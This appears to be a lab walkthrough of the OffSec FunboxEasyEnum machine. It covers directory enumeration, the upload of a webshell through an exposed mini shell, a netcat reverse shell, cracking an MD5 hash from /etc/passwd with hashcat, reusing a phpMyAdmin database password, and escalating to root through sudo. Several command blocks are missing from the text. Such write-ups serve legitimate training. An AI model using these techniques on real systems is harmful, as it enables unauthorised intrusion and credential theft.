Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.
We now move onto enumerating with
dirsearch.py. First running seclists big.txt against the target.
We view robots.txt and find it contains contains:
dirsearch.py against this and was unable to find anything further. Viewing
/phpmyadmin and attempting to login with default credentials shows we are unable to proceed with the default root account.
Running dirsearch.py again on the target this time using the
--suffix parameter to append .php to all entries we find
┌──(kali㉿puckie)-[~/offsec/funboxeasyenum] └─$ python3 /usr/share/dirsearch/dirsearch.py -u http://192.168.109.132/ -w /usr/share/dirb/wordlists/big.txt --full-url -t 75 --suffix=.php _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | Suffixes: .php | HTTP method: GET | Threads: 75 Wordlist size: 20468 Output File: /home/kali/.dirsearch/reports/192.168.109.132/_21-08-27_08-32-48.txt Error Log: /home/kali/.dirsearch/logs/errors-21-08-27_08-32-48.log Target: http://192.168.109.132/ [08:32:48] Starting: [08:32:49] 403 - 280B - http://192.168.109.132/.htpasswd.php [08:32:53] 403 - 280B - http://192.168.109.132/.htaccess.php [08:33:32] 200 - 4KB - http://192.168.109.132/mini.php Task Completed
/mini.php we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php
Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data.
Running the command
which nc shows we have
netcat installed on the target machine. I set up a
netcat listener on my target machine then run the following command on the webshell:
Resulting in a reverse shell.
Upgrade the shell:
Checking /etc/passwd shows the user ‘oracle’ has a password hash in the file.
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash lissy:x:1005:1005::/home/lissy:/bin/sh $
I then took the hash and run it under mode 500 on
Hashcat on my Windows host which cracked the password as: hiphop
PS E:\PENTEST\hashcat-4.2.1> .\hashcat32.exe -m500 .\linuxhash.TXT E:\PENTEST\thc-hydra\rockyou.txt --force hashcat (v4.2.1) starting... OpenCL Platform #1: Intel(R) Corporation ======================================== * Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Dictionary cache built: * Filename..: E:\PENTEST\thc-hydra\rockyou.txt * Passwords.: 14344391 * Bytes.....: 139921497 * Keyspace..: 14344384 * Runtime...: 9 secs $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop Session..........: hashcat Status...........: Cracked Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) Hash.Target......: $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0
I then used
su to switch to the user ‘oracle’ and was successful switching.
After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.
I disconnected the shell and run the initial exploit on the web shell to get connect as www-data. Moving into
/etc/phpyadmin and then reading read the config-db.php file we see credential information.
We find the credentials
phpmyadmin:tgbzhnujm! I then logged in MySQL and was unable to identify interesting information in the contained databases.
From here I starting throwing the passwords at the users in the
/home/ directory until I got a match on the user ‘karla’.
Knowing this worked I excited the shell and logged into
SSH with the same information just so we have all the advantages of a
$ su karla su: must be run from a terminal $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@funbox7:/$ su karla su karla Password: tgbzhnujm! To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. karla@funbox7:/$ sudo -l sudo -l [sudo] password for karla: tgbzhnujm! Matching Defaults entries for karla on funbox7: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User karla may run the following commands on funbox7: (ALL : ALL) ALL karla@funbox7:/$ sudo /bin/bash -p sudo /bin/bash -p root@funbox7:/#